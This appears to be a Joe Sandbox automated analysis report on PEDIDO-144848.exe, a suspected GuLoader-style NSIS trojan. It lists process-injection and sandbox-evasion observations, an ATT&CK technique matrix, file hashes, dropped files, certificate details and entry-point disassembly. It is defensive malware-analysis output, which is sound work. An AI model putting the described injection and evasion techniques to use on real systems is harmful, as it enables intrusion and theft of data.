        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E372 mov eax, dword ptr fs:[00000030h]2_2_36C7E372
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2237A mov eax, dword ptr fs:[00000030h]2_2_36C2237A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80371 mov eax, dword ptr fs:[00000030h]2_2_36C80371
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80371 mov eax, dword ptr fs:[00000030h]2_2_36C80371
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF9303 mov eax, dword ptr fs:[00000030h]2_2_36BF9303
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF9303 mov eax, dword ptr fs:[00000030h]2_2_36BF9303
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF30A mov eax, dword ptr fs:[00000030h]2_2_36CBF30A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8330C mov eax, dword ptr fs:[00000030h]2_2_36C8330C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E310 mov eax, dword ptr fs:[00000030h]2_2_36C1E310
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E310 mov eax, dword ptr fs:[00000030h]2_2_36C1E310
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E310 mov eax, dword ptr fs:[00000030h]2_2_36C1E310
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3631F mov eax, dword ptr fs:[00000030h]2_2_36C3631F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38322 mov eax, dword ptr fs:[00000030h]2_2_36C38322
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38322 mov eax, dword ptr fs:[00000030h]2_2_36C38322
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38322 mov eax, dword ptr fs:[00000030h]2_2_36C38322
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2332D mov eax, dword ptr fs:[00000030h]2_2_36C2332D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF8347 mov eax, dword ptr fs:[00000030h]2_2_36BF8347
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF8347 mov eax, dword ptr fs:[00000030h]2_2_36BF8347
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF8347 mov eax, dword ptr fs:[00000030h]2_2_36BF8347

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FFE69879E7F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FFE96E82651
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe NtResumeThread: Indirect: 0x36913C29
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe NtSetContextThread: Indirect: 0x369135E9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe NtSuspendThread: Indirect: 0x36913909
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x5A127AE
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtAllocateVirtualMemory: Direct from: 0x7FFE7A795AE0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x5A1A318
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x5A125ED
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe NtQueueApcThread: Indirect: 0x3690F414
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x5A1281F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\SecEdit.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
        Source: C:\Windows\SysWOW64\SecEdit.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\SecEdit.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Thread register set: target process: 6432
        Source: C:\Windows\SysWOW64\SecEdit.exe Thread register set: target process: 6432
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Process created: C:\Users\user\Desktop\PEDIDO-144848.exe "C:\Users\user\Desktop\PEDIDO-144848.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_00405DC2 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

        Stealing of Sensitive Information

        Source: Yara match File source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match File source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 12 Masquerading | OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
        | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 311 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
        [Behavior graph, ID: 1528317. Sample: PEDIDO-144848.exe, Startdate: 07/10/2024, Architecture: WINDOWS, Score: 96. Process chain: PEDIDO-144848.exe (started) -> PEDIDO-144848.exe (started) -> RAVCpl64.exe (injected) -> SecEdit.exe (started) -> explorer.exe (injected). Network: drive.google.com 142.250.80.46, 443 and drive.usercontent.google.com 142.251.40.97, 443 (GOOGLEUS, United States). Dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32.]

        | Source | Detection | Scanner | Label |
        | --- | --- | --- | --- |
        | PEDIDO-144848.exe | 24% | ReversingLabs | Win32.Trojan.NsisInject |
        | PEDIDO-144848.exe | 100% | Joe Sandbox ML | |

        | Source | Detection | Scanner | Label |
        | --- | --- | --- | --- |
        | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
        | --- | --- | --- | --- | --- | --- |
        | drive.google.com | 142.250.80.46 | true | false | | unknown |
        | drive.usercontent.google.com | 142.251.40.97 | true | false | | unknown |
                                    | IP | Domain | Country | ASN | ASN Name | Malicious |
                                    | --- | --- | --- | --- | --- | --- |
                                    | 142.250.80.46 | drive.google.com | United States | 15169 | GOOGLEUS | false |
                                    | 142.251.40.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1528317
                                    Start date and time:2024-10-07 19:21:34 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 17m 51s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:4
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:2
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:PEDIDO-144848.exe
                                    Detection:MAL
                                    Classification:mal96.troj.evad.winEXE@5/7@2/2
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HCA Information:
                                    • Successful, ratio: 86%
                                    • Number of executed functions: 61
                                    • Number of non-executed functions: 307
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: PEDIDO-144848.exe
                                    | Time | Type | Description |
                                    | --- | --- | --- |
                                    | 13:27:15 | API Interceptor | 11664548x Sleep call for process: SecEdit.exe modified |
                                    | 13:29:39 | API Interceptor | 164x Sleep call for process: explorer.exe modified |
                                    No context
                                    No context
                                    No context
                                    | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                                    | --- | --- | --- | --- | --- |
                                    | 37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exe | malicious | Unknown | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | down.exe | malicious | Unknown | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | jre-6-windows-i586.exe | malicious | Unknown | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | transferencia.exe | malicious | FormBook, GuLoader | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe | malicious | GuLoader, Snake Keylogger | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | t5985gRtZo.lnk | malicious | Unknown | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | 0urFbKxdvL.exe | malicious | Unknown | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | zncaKWwEdq.exe | malicious | Vidar | 142.250.80.46, 142.251.40.97 |
                                    | 37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 142.250.80.46, 142.251.40.97 |
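                                    | Match | Associated Sample Name / URL | Detection | Threat Name |
                                    | --- | --- | --- | --- |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | transferencia.exe | malicious | FormBook, GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | transferencia.exe | malicious | GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | KZ710-0038.exe | malicious | Remcos, GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | KZ710-0038.exe | malicious | GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | dc#U10d8.exe | malicious | FormBook, GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | dc#U10d8.exe | malicious | GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | 4455.exe | malicious | FormBook, GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | 4455.exe | malicious | GuLoader |
                                    | C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll | #U0421#U041c#U0413#U0421 #U0412#U0430#U0433#U043e#U043d #U211628870905.exe | malicious | FormBook, GuLoader |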
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):34
                                                      Entropy (8bit):4.35937791471612
                                                      Encrypted:false
                                                      SSDEEP:3:oMXADiGWkon:xnGWn
                                                      MD5:5BAD417385FA63549574090876DC680D
                                                      SHA1:84E00066DC079E657BE9AF39E2C9E4EC42F5E527
                                                      SHA-256:8B8CCA2780BD72F608E87BAEC979BBB17706AEFEB8D9F603E53AE144ECFAB71D
                                                      SHA-512:EA709BAB31CFAAB4979617C4D1DFF414387F6988BE9F67E70BF7F941A9E7EA4C36CF320CE2518AE0DD9171DF5C46BE85D86D3F6031059A3CB3E79FD58E3F14E2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:[Omniregent]..promovable=bugspyt..
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):11264
                                                      Entropy (8bit):5.7711167426271945
                                                      Encrypted:false
                                                      SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                      MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                      SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                      SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                      SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: transferencia.exe, Detection: malicious
                                                      • Filename: transferencia.exe, Detection: malicious
                                                      • Filename: KZ710-0038.exe, Detection: malicious
                                                      • Filename: KZ710-0038.exe, Detection: malicious
                                                      • Filename: dc#U10d8.exe, Detection: malicious
                                                      • Filename: dc#U10d8.exe, Detection: malicious
                                                      • Filename: 4455.exe, Detection: malicious
                                                      • Filename: 4455.exe, Detection: malicious
                                                      • Filename: #U0421#U041c#U0413#U0421 #U0412#U0430#U0433#U043e#U043d #U211628870905.exe, Detection: malicious
                                                      Reputation:moderate, very likely benign file
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):195963
                                                      Entropy (8bit):7.548314521933
                                                      Encrypted:false
                                                      SSDEEP:3072:h53xtSRcBwB5S7jyqo+7tKe4C834+CLO1viUBzxQKkfqHk+OMiZXBUGDDoqIn6:D+Uw7S6J+bY48aUBzvkf+k+OMQ6Ggn6
                                                      MD5:9EB63435670F759E6741E3DB91C9389A
                                                      SHA1:4CF1E7A48E3B14D79689AB60927A0BC5485ED060
                                                      SHA-256:AB12F771F3E857807A5264382E602D6C336A3E9E657C0AAECB0A812E6DCEA386
                                                      SHA-512:E056F5D53BBDE0B2358A7B200922D8F31EC216605626E797C532AC4CEA99AEA4FFDC36CCA3EBBB5988DF19CA2C5F97ABA8398CE94A98C92D69BDBA2E85590FD6
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):440396
                                                      Entropy (8bit):2.656467684169908
                                                      Encrypted:false
                                                      SSDEEP:1536:3eBqsoDZCblQiHdWRUmxbNn6cldzln5cGe+q8bBvzO4suXyRdPeF3U5tmq3QAZYU:3Ex7W5zl2BVUIT59OliZ/4P0FuxFe
                                                      MD5:8AF191D07992E5026F3D1C084B0B9674
                                                      SHA1:8AA1C0903397F405A9EE75B48679076498BD4B33
                                                      SHA-256:E7C1DDF4BA6441AD36773538A479D1967D0BC91FA62E8E28E0B56AFFA86EDFB3
                                                      SHA-512:E4DCAB5BAF44044CF13DBDE98F6AB26F9C5DE70B7D0F2A71D3C3F2C0C16645A671A566577C5C935E6BF02B5E1BC18563CD4CD96D39AF168FD25AF119E2068661
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):339393
                                                      Entropy (8bit):1.2543469977620876
                                                      Encrypted:false
                                                      SSDEEP:1536:JwpZQcXbJ+mf8ME8s+dg5Z90uGaXF9Pl7:W4cX8ncmxhGm
                                                      MD5:F6A8488B1B62B7AC3B0979C8FBEABB30
                                                      SHA1:9725896EBC26CCB2CB9060640B9E0D4A0618916F
                                                      SHA-256:34DC9B70D0CE5223A531E499611F1208F3AE85AAEF9973FC27E89190568F8EE2
                                                      SHA-512:88A719685D0972290632C6B5A665184E79A98BE22B76AF28F18056F2E7A721A0B2D3B4A8815BCE562426643E69F998F9E45F3CA62B3288EAAFB71FE89A23AD20
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):456047
                                                      Entropy (8bit):1.2479728238915362
                                                      Encrypted:false
                                                      SSDEEP:768:WqBSYr/TzktUI9ql+6iD8iDu43pfrmQ+PHlyjwkZY51UG90JdfSDUsby4/FApmbO:I3TS9ymKhysrQEkRbwvL3xcbNyFN2Mv
                                                      MD5:9911B32FE219697A738F39AE5766B512
                                                      SHA1:DA67EBB043C778DEEA874E1C746483A2B65E533C
                                                      SHA-256:1D3D52ECB41F725DC23080ACB1ACDFEDF29BB5F167DCB75F89AF837888421880
                                                      SHA-512:FBF703CD56434BB14C6A1A34878F094BE183D9F638D0F34074F7EE4C9D12DB70A833679B496FCB1E4C6050C418A906221149AAC70035BCDA3C01D4272C0FE3E8
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):276
                                                      Entropy (8bit):4.348758704403097
                                                      Encrypted:false
                                                      SSDEEP:6:4s/IdpH+oqGSUkJOlUjvMzJ7HxXEp6JN+qIN2CGZgw9n7FmNIb+:4skpesSUAOlSsJ7BEpg+H2XWwTmCq
                                                      MD5:668A01D3AF55A42FBFDBB1E9DD730B59
                                                      SHA1:E0949D489A15516B3CD09F1043543C38E3688F1A
                                                      SHA-256:6A7FEEBFE1F4330E611E6E1B3804619D329A9D3ABD3A3ECBD9D441F884E9999D
                                                      SHA-512:CF3F03583667362ADCEA4DEB094513B84D3E275EBCC42A993F9293B7374618A1BA060D4C4BAE446C02B329DDE2A4579C152F54A1F7537A0F83A3E88406509459
                                                      Malicious:false
                                                      Preview:vulcanizable zoanthidae raalam osullivan,phantasmic oxyluminescence fluidness pickin raadelig.muslimer broder encyclopaedically bessarabian bvt.skyggespillene shellfishes urmi fume panocha imago,troskabseder cypriotes thalassian,udvandringskontorers telfonmontrens bugtalende.
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.301140250836449
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:PEDIDO-144848.exe
                                                      File size:614'672 bytes
                                                      MD5:0d9f261233df472092fbfbb1e982bbe7
                                                      SHA1:003feaf99830b2aac6213ede7d72b148b709da0b
                                                      SHA256:57e01b9f47d3220585bdef71852add983d96d959c08b961b1f2795ef07d78160
                                                      SHA512:4b5e0e9b5412c369cbdc3bf17c3daf394ae424e2888c9ccc9a752118738909710e8ef770a9afbe2c4bb8b92d501b39e132a7ef696a17968f0deac31e0530bf8e
                                                      SSDEEP:12288:H22tNcD43mIga1oZVSnPqls/sFVk906OLRHk:H22tGD43XrfPwzH6O9Hk
                                                      TLSH:80D4F143764598E0F8A21D7158BB4A6149BF5F3BBA80282FB7D8730614F214B4B3E7D6
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L.....MX.................`....9....
                                                      Icon Hash:8b1985c04404416d
                                                      Entrypoint:0x403180
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x584DCA1F [Sun Dec 11 21:50:23 2016 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                      Signature Valid:false
                                                      Signature Issuer:CN="Kovil Caisson Bhmere ", E=Reobjectivize@Excreation.Cy, L=Horsarrieu, S=Nouvelle-Aquitaine, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 31/05/2024 12:44:13 31/05/2027 12:44:13
                                                      Subject Chain
                                                      • CN="Kovil Caisson Bhmere ", E=Reobjectivize@Excreation.Cy, L=Horsarrieu, S=Nouvelle-Aquitaine, C=FR
                                                      Version:3
                                                      Thumbprint MD5:07E47CC1F9EBBA51D31EFE54E903163E
                                                      Thumbprint SHA-1:72A19948CAB480E03E59FFD2E399BAF955540C4E
                                                      Thumbprint SHA-256:6965A8E64D5D22CEB7B775620F7EDBBC5F29D9B2FB741502EFD803DFAF603DE0
                                                      Serial:6E220BC67210C42F04C77D51B104154475E9EE96
                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 00409198h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [004070A8h]
                                                      call dword ptr [004070A4h]
                                                      cmp ax, 00000006h
                                                      je 00007FC2A119FF43h
                                                      push ebx
                                                      call 00007FC2A11A2EB1h
                                                      cmp eax, ebx
                                                      je 00007FC2A119FF39h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 00407298h
                                                      push esi
                                                      call 00007FC2A11A2E2Dh
                                                      push esi
                                                      call dword ptr [004070A0h]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007FC2A119FF1Dh
                                                      push ebp
                                                      push 00000009h
                                                      call 00007FC2A11A2E84h
                                                      push 00000007h
                                                      call 00007FC2A11A2E7Dh
                                                      mov dword ptr [007A1F44h], eax
                                                      call dword ptr [00407044h]
                                                      push ebx
                                                      call dword ptr [00407288h]
                                                      mov dword ptr [007A1FF8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0079D500h
                                                      call dword ptr [00407174h]
                                                      push 00409188h
                                                      push 007A1740h
                                                      call 00007FC2A11A2AA7h
                                                      call dword ptr [0040709Ch]
                                                      mov ebp, 007A8000h
                                                      push eax
                                                      push ebp
                                                      call 00007FC2A11A2A95h
                                                      push ebx
                                                      call dword ptr [00407154h]
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c3000 | 0x28340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x94d80 | 0x1390 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
